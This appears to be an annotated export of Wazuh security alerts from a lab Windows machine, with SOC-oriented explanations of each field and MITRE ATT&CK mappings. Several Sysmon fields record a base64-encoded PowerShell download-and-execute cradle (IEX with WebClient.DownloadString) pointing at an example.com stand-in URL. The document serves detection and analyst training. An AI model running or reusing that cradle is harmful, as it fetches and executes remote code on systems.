Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534214.945137
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:45.9124642Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282194
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:45.401 ProcessGuid: {94294ddc-bcc1-680a-ac0a-000000000e00} ProcessId: 8908 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bcbf-680a-a90a-000000000e00} ParentProcessId: 11892 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:45.401
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcc1-680a-ac0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8908
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bcbf-680a-a90a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  11892
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:36:54.103+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:54.103+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  22
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534214.953203
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:46.0795400Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282195
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:35:46.051 ProcessGuid: {94294ddc-bcc1-680a-ac0a-000000000e00} ProcessId: 8908 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_toe2blgg.cdx.ps1 CreationUtcTime: 2025-04-24 22:35:46.051 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:46.051
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcc1-680a-ac0a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8908
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_toe2blgg.cdx.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:35:46.051
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:54.457+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:54.457+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  51
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534214.955967
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:47.1449849Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43824
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4968
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:36:54.471+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:54.471+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.firedtimes:  10
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534214.963303
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:47.3006529Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2990
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  Background Intelligent Transfer Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param2:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param3:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param4:  BITS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Discovery activity executed

🧠 What happened? Discovery activity executed

🔍 Why it's important: No strong indicators

🕒 2025-04-24T22:36:54.581+0000 | 🧠 MITRE: ['Discovery'] – ['Account Discovery'] [T1087]

🚨 Severity: Low

🧪 Investigation Guidance

[Unknown] T1087 – Account Discovery

🔍 Full Alert Details
timestamp:  2025-04-24T22:36:54.581+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Discovery activity executed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92031
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1087']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Discovery']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Account Discovery']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  4
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534214.965113
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:35:48.0453368Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  282223
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:35:48.034 ProcessGuid: {94294ddc-bcc4-680a-b00a-000000000e00} ProcessId: 11608 Image: C:\Windows\SysWOW64\net1.exe FileVersion: 10.0.26100.1 (WinBuild.160101.0800) Description: Net Command Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: net1.exe CommandLine: C:\WINDOWS\system32\net1 accounts CurrentDirectory: C:\Program Files (x86)\ossec-agent\ User: NT AUTHORITY\SYSTEM LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000} LogonId: 0x3E7 TerminalSessionId: 0 IntegrityLevel: System Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 ParentProcessGuid: {94294ddc-bcaa-680a-930a-000000000e00} ParentProcessId: 11676 ParentImage: C:\Windows\SysWOW64\net.exe ParentCommandLine: net.exe accounts ParentUser: NT AUTHORITY\SYSTEM"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:35:48.034
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bcc4-680a-b00a-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

